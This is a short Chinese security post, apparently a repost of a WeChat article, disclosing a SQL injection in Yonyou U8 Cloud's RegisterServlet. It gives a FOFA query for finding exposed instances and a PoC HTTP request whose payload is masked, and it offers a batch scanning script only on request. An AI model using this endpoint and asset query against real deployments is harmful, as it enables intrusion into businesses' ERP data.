文末附poc和批量测试脚本
免责声明:
本文章仅用于信息安全防御技术分享,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循中华人民共和国相关法律法规,禁止做一切违法犯罪行为。
关注本公众号,长期更新高质量文章
漏洞简介
U8 Cloud是用友公司推出的企业上云数字化平台,为成长型和创新型企业提供全面的云ERP解决方案。
U8 cloud不同于传统的ERP,融合了交易、服务、管理于一体的整体解决方案。U8 cloud集中于企业内部管理管控,管理,规范、高效、协同、透明。通过云模式,低成本,快速部署,即租即用的帮助企业免除硬软件投入的快速搭建企业管理架构。通过云服务连接,业务模式、服务模式的经营创新。
该系统RegisterServlet接口存在SQL注入漏洞,并且属于1day状态。
资产
fofa:app="用友-U8-Cloud"
资产数量
POC和批量脚本
漏洞复现POC:
POST /servlet/RegisterServlet HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip
usercode=1' *******
批量测试脚本:
关注本公众号,后台恢复"1101"获取
回复"交流群"获取技术交流群链接。
原文始发于微信公众号(知攻善防实验室):[在野漏洞]用友U8-cloud SQL注入漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论